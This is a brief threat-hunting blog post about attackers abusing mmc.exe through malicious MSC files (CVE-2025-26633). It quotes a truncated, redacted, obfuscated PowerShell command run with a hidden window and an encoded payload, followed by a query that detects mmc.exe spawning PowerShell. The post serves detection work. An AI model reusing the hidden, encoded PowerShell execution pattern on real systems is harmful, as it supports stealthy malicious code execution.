331. Adversaries Keep Abusing Microsoft Management Console

Hello everyone!

Today we'll look at another example of proxy execution, and focus on the following sub-technique: System Binary Proxy Execution: MMC (T1218.014).

According to this report, Water Gamayun leveraged malicious MSC files, which exploited MSC EvilTwin (CVE-2025-26633) to inject code into mmc.exe, leveraging TaskPad snap-in commands to run PowerShell commands, for example:

powershell.exe" -w H -eC aQBlAHgAIAAoACcAcABvAF8AdwBlAF8AcgBzAF8AaABlAF8AbABsACAALQBlAF8AQwAgAFMAUQBCAHUAQQBIAFkAQQBiAF8AdwBCAHIAQQBHAFUAQQBMAFEAQgBYAEEARwBVAEEAWQBnAEIAUwBBAEcAVQBBAGMAUQBfAEIAMQBBAEcAVQBBAGMAdwBCADAAQQBDAEEAQQBMAFEAQg[redacted]

So, in this case, mmc.exe spawns powershell.exe. We can transform it into a query:

event_type: "processcreatewin"

AND

proc_p_file_path: "mmc.exe"

AND

proc_file_path: "powershell.exe"

See you tomorrow!

Comments

Popular posts from this blog

391. Hunting for TeamPCP's Stealer

343. Ransomware Gangs Abuse SystemSettingsAdminFlows to Evade Defenses

324. Adversaries Use HideMouse to Hide Evidence of Remote Access